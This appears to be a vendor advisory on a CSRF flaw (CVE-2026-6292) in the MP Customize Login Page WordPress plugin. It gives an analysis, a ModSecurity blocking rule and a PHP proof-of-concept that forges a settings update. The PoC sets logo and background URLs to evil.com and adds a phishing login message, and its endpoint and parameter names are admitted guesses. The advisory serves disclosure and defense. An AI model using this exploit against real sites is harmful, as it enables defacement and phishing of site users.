Atomic Edge analysis of CVE-2026-6292 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the MP Customize Login Page plugin for WordPress, affecting all versions up to and including 1.0. The core issue lies in the broken nonce validation within the enter_mpclp_login_options() function, which combines an inverted logic check and a missing required parameter, rendering the nonce verification ineffective. An unauthenticated attacker can trick a logged-in administrator into submitting a malicious request to modify plugin settings.
The root cause, inferred from the CWE (352) and the description, is a flawed implementation of nonce verification. The enter_mpclp_login_options() function contains an inverted condition: if wp_verify_nonce(…) returns true (nonce valid), the function returns false, stopping execution. However, a valid nonce would normally allow the operation. Worse, the call to wp_verify_nonce() is missing the required action parameter, so it always returns false. Combined, the inverted check allows execution to continue when the nonce is invalid (the typical CSRF scenario). The handler is registered via a hook on init without any capability check, so no authentication or authorization gates exist beyond the broken nonce. Atomic Edge analysis confirms these conclusions from the description; no code diff is available to verify the exact implementation.
Exploitation requires an attacker to craft a malicious HTML form or a cross-origin request that submits to the WordPress admin area. The vulnerable endpoint is likely tied to an admin-ajax action or a direct POST handler, such as /wp-admin/admin-post.php?action=mpclp_save_options or a similar pattern based on the plugin slug. The attacker creates a page that triggers a POST request to the target site. The request includes all plugin settings parameters (e.g., background color, logo URL, button colors, login message). Since the nonce check is broken, no valid nonce is needed. The attacker tricks an admin user (e.g., via a link in an email) to visit the crafted page while logged in. The browser automatically sends the admin’s cookies, performing the action on their behalf.
Based on the CWE and vulnerability type, the fix must correct the nonce validation logic. The enter_mpclp_login_options() function should call wp_verify_nonce() with a proper action parameter (e.g., ‘mpclp_save_settings’) and a nonce field from the request (typically ‘_wpnonce’). The inverted check should be removed. Additionally, capability checks (e.g., current_user_can(‘manage_options’)) must be added before processing settings updates to ensure only authorized administrators can modify plugin options.
The impact of successful exploitation allows an attacker to change the plugin’s login page settings. These include background images, logo URLs, button colors, and the login message. An attacker could replace the logo URL with a malicious link or upload a phishing image, or alter the login message to mislead users. This could lead to defacement or social engineering attacks, but does not directly allow privilege escalation or data theft. The CVSS score of 4.3 (Medium) reflects the limited integrity impact and the requirement for user interaction (tricking an admin).
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-6292 (metadata-based)
# Blocks CSRF attacks targeting MP Customize Login Page settings update
# The vulnerable endpoint is /wp-admin/admin-post.php with action 'mpclp_save_options'
# The rule blocks any request to this endpoint without a valid nonce (the nonce check is broken, but we block all such requests as a virtual patch)
# Since the nonce is missing, we can safely block all requests to this action without a valid nonce parameter
SecRule REQUEST_URI "@streq /wp-admin/admin-post.php"
"id:2026292,phase:2,deny,status:403,chain,msg:'CVE-2026-6292 - CSRF in MP Customize Login Page',severity:'CRITICAL',tag:'CVE-2026-6292'"
SecRule ARGS_POST:action "@streq mpclp_save_options" "chain"
SecRule ARGS_POST:_wpnonce "@unconditionalMatch" "t:none"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6292 - MP Customize Login Page <= 1.0 - CSRF to Settings Update
// Configurable target URL (WordPress installation)
$target_url = 'http://example.com';
// Vulnerable endpoint: likely /wp-admin/admin-post.php with action parameter
// The exact action name is inferred from plugin slug: 'mpclp_save_options'
$endpoint = '/wp-admin/admin-post.php';
$full_url = rtrim($target_url, '/') . $endpoint;
// Attacker-controlled payload for plugin settings update
// These parameters are typical for a login page customizer plugin
$post_data = array(
'action' => 'mpclp_save_options',
// No nonce needed due to broken verification
'mpclp_background_color' => '#ff0000',
'mpclp_logo_url' => 'http://evil.com/phishing_logo.png',
'mpclp_logo_width' => '300',
'mpclp_logo_height' => '100',
'mpclp_button_color' => '#00ff00',
'mpclp_button_text_color' => '#ffffff',
'mpclp_login_message' => 'Please enter your credentials on this fake login page.',
// Add any other known settings parameters from the plugin
// These are inferred based on common login page customization options
'mpclp_background_image' => 'http://evil.com/background.png',
'mpclp_custom_css' => ''
);
// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $full_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_COOKIE, ''); // The victim's cookies are sent automatically if they are logged in
// For test environments, you may need to set a specific cookie
// curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_xxx=sessionvalue...');
// Optional: Add headers to mimic a legitimate request
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
));
// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
// Check for success indicators
if ($http_code == 200 || $http_code == 302 || $http_code == 301) {
echo "[+] Request sent successfully. HTTP Status: $http_coden";
echo "[+] If the admin was logged in, the settings have been changed.n";
} else {
echo "[-] Request failed with HTTP Status: $http_coden";
echo "[-] Debug: Check the target URL and ensure WordPress is reachable.n";
}
// Display the response for debugging
// echo "Response: " . substr($response, 0, 500) . "n";
curl_close($ch);
// Assumptions made in this PoC:
// 1. The vulnerable endpoint is /wp-admin/admin-post.php with action 'mpclp_save_options'
// 2. No nonce is required for the CSRF attack to succeed
// 3. The attacker crafts a page that an admin visits while logged in
// This script demonstrates the CSRF by sending the request directly; in a real attack, the payload would be embedded in a malicious HTML page.
?>
